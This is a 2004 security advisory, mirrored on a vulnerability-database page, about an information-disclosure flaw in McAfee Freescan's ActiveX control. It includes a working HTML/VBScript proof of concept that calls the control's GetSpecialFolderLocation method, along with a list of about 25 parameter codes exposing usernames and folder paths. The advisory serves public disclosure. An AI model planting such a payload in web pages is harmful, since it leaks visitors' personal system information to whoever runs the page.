Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:6031
HistoryApr 08, 2004 - 12:00 a.m.

McAfee Freescan ActiveX Information Disclosure [Additional Details & PoC]

2004-04-0800:00:00
vulners.com
8
JSON

McAfee Freescan ActiveX Information Disclosure [Additional Details & PoC]

I. ABSTRACT:

McAfee Freescan is an online ActiveX based Antivirus utility.

II. DESCRIPTION:

I've been working on an information disclosure vulnerability in McAfee Freescan for a few
days. However, Rafel Ivgi disclosed it publicly on 6th April 2004 [1]. I have a few additional
details to add to his original advisory.

III. IMPACT:

Disclosure of sensitive information to an unauthorised attacker.

IV. TECHNICAL DETAILS:

As Rafel Ivgi has mentioned in his advisory, there is a vulnerable method "BSTR
GetSpecialFolderLocation(USERDEFINED eShellFolder)" which is provided by the ActiveX Control
"McFreeScan.CoMcFreeScan.1" with classid "{EF791A6B-FC12-4C68-99EF-FB9E207A39E6}". This control
is installed by the above mentioned product when it is used for the first time.

When the vulnerable method is accessed with specific parameters, it discloses sensitive
information about the victim's computer to the attacker including the current logged in
username and the path of several "shell folders". Rafel, in his advisory mentioned only two of
the parameters but, according to my research, several more parameters (about 25) are available
which enable the attacker to gather more information.

V. Proof of Concept:

There are about 25 parameters that the "GetSpecialFolderLocation" method can take. This PoC
lists all of them:

<OBJECT ID="MCFS" WIDTH=0 HEIGHT=0
CLASSID="CLSID:EF791A6B-FC12-4C68-99EF-FB9E207A39E6"></OBJECT>

<script language=vbscript>

sPath = MCFS.GetSpecialFolderLocation(&H0000)

'Gets the path for the desktop folder.

document.write(sPath)

'The Available parameters for the method and their return values:
'
'&H0000=desktop
'&H0002=%username%start menu/programs
'&H0005=%username%/my documents
'&H0006=%username%/favorites
'&H0007=%username%start menu/programs/startup
'&H0008=%username%/recent
'&H0009=%username%/sendto
'&H0010=%username%/desktop
'&H0013=%username%/nethood
'&H0014=%windir%/fonts
'&H0015=%username%/templates
'&H0016=all users/start menu
'&H0017=all users/start menu/programs
'&H0018=all users/start menu/programs/startup
'&H0019=all users/desktop
'&H0020=%username%/Local Settings/Temporary Internet Files
'&H0021=%username%/cookies
'&H0022=%username%/local settings/history
'&H0023=All Users/Application Data
'&H0024=%windir%
'&H0025=%windir%/system32
'&H0026=%programfiles%
'&H0027=%username%/My Documents/My Pictures
'&H0028=%username%
'&H0029=%windir%

</script>

V. DISCLAIMER:

This advisory is meant only for the dissemination of information, alerting the general public
about a security issue. Use this information at your own discretion.

In brief, the author is not responsible for any use, misuse, abuse of this information. Also,
this information is provided "as is" without any warranty of any kind.

PHEW

EOF

JSON